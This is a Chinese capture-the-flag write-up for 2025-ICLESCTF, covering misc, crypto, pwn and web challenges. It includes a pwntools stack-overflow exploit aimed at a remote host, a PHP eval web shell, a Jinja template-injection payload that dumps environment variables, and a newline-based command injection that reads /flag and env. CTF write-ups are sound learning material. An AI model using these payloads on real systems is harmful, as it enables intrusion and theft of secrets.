2025-ICLESCTF-WP

MISC

1、Interesting_web

题解:
(1)打开网站发现四张dif图片快速闪;下载下来使用工具分祯查看得到flag
在这里插入图片描述

2、Hidden_Evidence

题解:
(1)访问⽹站,F12,发现JPG⽂件,下载,010编辑器加载,头部发现:Flag: c2VjcmV0X3NlY3JldA==
转Base64

3、⽹络迷踪

题解:
(1)简单的社工;下载图⽚,发现I GZ,⼴州缩写;图⽚扔给百度,发现⼩红书⼀篇⽂章,关键词:98层酒店
直接关键词百度找到⼴州四季酒店
flag{⼴东省-⼴州市-天河区-珠江新城珠江西路-5号}

Crypto

1、xor_index_cipher

题解:
(1)明⽂与key逐⼀异或,然后加上序号,再对256取模,把加密代码扔给deepseek,⾃动⽣成解密代码

2、RSA

题解:
(1)预期解:p和q 很接近;直接对n方开跟求下一个素数就是p
(2)非预期解:N可以直接分解

3、破解数据流

题解:
(1)给出了加密代码;很简单的LCG;发现与key异或(4个字节4个字节异或);直接nc连接;发送密文让去和key异或得到明文;最后hex转字符结束

PWN

1、easy_pwn_2

题解:
(1)flag直接放你脸上了;IDA打开就可以

2、calculator

题解:
(1)首先checksec;发现没开canart和PIE;应该栈溢出
在这里插入图片描述
发现后⾯函数secret_backdoor,会打印出flag
在这里插入图片描述
calculate函数存在栈溢出
所以直接栈溢出跳到后⻔函数就可以拿到flag

from pwn import *
context(log_level="debug", arch="i386", os="linux")
# p = process("./vuln")
p = remote("ctf.2v8.cn",20710)
pay = b"a"*(0x48+0x4)
backdoor = 0x080491C6
payload = pay + p32(backdoor)
p.sendline(payload)
p.interactive()

WEB

1、upload-difficult

题解:
(1)很弱智的一个文件上传;直接上传马子访问phpinfo;得到flag

:<?php eval($_REQUEST['cmd']); ?>

2、template_injection

题解:
(1)首先尝试工具梭哈发现没绕过waf;题目提示个lipsum.globals;发现过滤了() 和[];但是os模块可以利用;直接查看环境变量得到flag

{{lipsum.__globals__.os.environ}}

3、ping_server

题解:
(1)⼀眼命令注⼊,尝试&&、||、;等均⽆法绕过,试下换⾏,发现可⾏;cat+/flag发现找不到⽂件,猜测在环境变量⾥,env拿到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巅峰赛2000分以下是巅峰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值